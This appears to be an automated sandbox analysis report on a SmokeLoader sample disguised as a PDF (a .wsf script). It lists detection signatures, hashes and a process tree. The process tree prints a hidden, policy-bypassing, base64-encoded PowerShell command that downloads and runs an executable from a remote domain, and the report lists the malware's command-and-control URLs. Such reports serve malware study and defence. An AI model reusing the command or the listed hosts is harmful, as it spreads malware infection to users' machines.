Edit tour
Windows
Analysis Report
3312.PDF.wsf
Overview
General Information
| Sample name: | 3312.PDF.wsfrenamed because original name is a hash value |
| Original sample name: | _i_300924_i_30_09_2024___UA973248410000000026006263312.PDF.wsf |
| Analysis ID: | 1525803 |
| MD5: | 701f5342e776f67438ee65a228b3d43d |
| SHA1: | a6a64eafe7d80017411bb18e8873f4623343fa66 |
| SHA256: | 19a2e0704d092bc44ba2802c45e6d845f6b912831c8a2b7f21d0b3d900408000 |
| Tags: | bestmagazineforanimalsunicum-ruwsfuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 8084 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\3312. PDF.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 2832 cmdline: "C:\Window s\System32 \cmd.exe" /c powErsh Ell -nop - w hiddEn - Ep bypass -Enc JABwA GEAdABoACA APQAgACQAR QBuAHYAOgB 0AGUAbQBwA CsAJwBcAG8 AQgB1AGYAL gBlAHgAZQA nADsAIAAkA GMAbABpAGU AbgB0ACAAP QAgAE4AZQB 3AC0ATwBiA GoAZQBjAHQ AIABTAHkAc wB0AGUAbQA uAE4AZQB0A C4AVwBlAGI AQwBsAGkAZ QBuAHQAOwA gACQAYwBsA GkAZQBuAHQ ALgBkAG8Ad wBuAGwAbwB hAGQAZgBpA GwAZQAoACc AaAB0AHQAc AA6AC8ALwB iAGUAcwB0A G0AYQBnAGE AegBpAG4AZ QBmAG8AcgB hAG4AaQBtA GEAbABzAHU AbgBpAGMAd QBtAC4AcgB 1AC8AZABvA HcAbgBsAG8 AYQBkAC8Ac wB2AGMALgB lAHgAZQAnA CwAJABwAGE AdABoACkAO wAgAFMAdAB hAHIAdAAtA FAAcgBvAGM AZQBzAHMAI AAtAEYAaQB sAGUAUABhA HQAaAAgACQ AcABhAHQAa AA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7248 cmdline: powErshEll -nop -w h iddEn -Ep bypass -En c JABwAGEA dABoACAAPQ AgACQARQBu AHYAOgB0AG UAbQBwACsA JwBcAG8AQg B1AGYALgBl AHgAZQAnAD sAIAAkAGMA bABpAGUAbg B0ACAAPQAg AE4AZQB3AC 0ATwBiAGoA ZQBjAHQAIA BTAHkAcwB0 AGUAbQAuAE 4AZQB0AC4A VwBlAGIAQw BsAGkAZQBu AHQAOwAgAC QAYwBsAGkA ZQBuAHQALg BkAG8AdwBu AGwAbwBhAG QAZgBpAGwA ZQAoACcAaA B0AHQAcAA6 AC8ALwBiAG UAcwB0AG0A YQBnAGEAeg BpAG4AZQBm AG8AcgBhAG 4AaQBtAGEA bABzAHUAbg BpAGMAdQBt AC4AcgB1AC 8AZABvAHcA bgBsAG8AYQ BkAC8AcwB2 AGMALgBlAH gAZQAnACwA JABwAGEAdA BoACkAOwAg AFMAdABhAH IAdAAtAFAA cgBvAGMAZQ BzAHMAIAAt AEYAaQBsAG UAUABhAHQA aAAgACQAcA BhAHQAaAA= MD5: 04029E121A0CFA5991749937DD22A1D9) 
oBuf.exe (PID: 2180 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\oBuf.e xe" MD5: 31059E7394B880F017E83804D9B716AB) 
explorer.exe (PID: 3968 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
- wbfgshs (PID: 6024 cmdline:
C:\Users\u ser\AppDat a\Roaming\ wbfgshs MD5: 31059E7394B880F017E83804D9B716AB)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 11 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||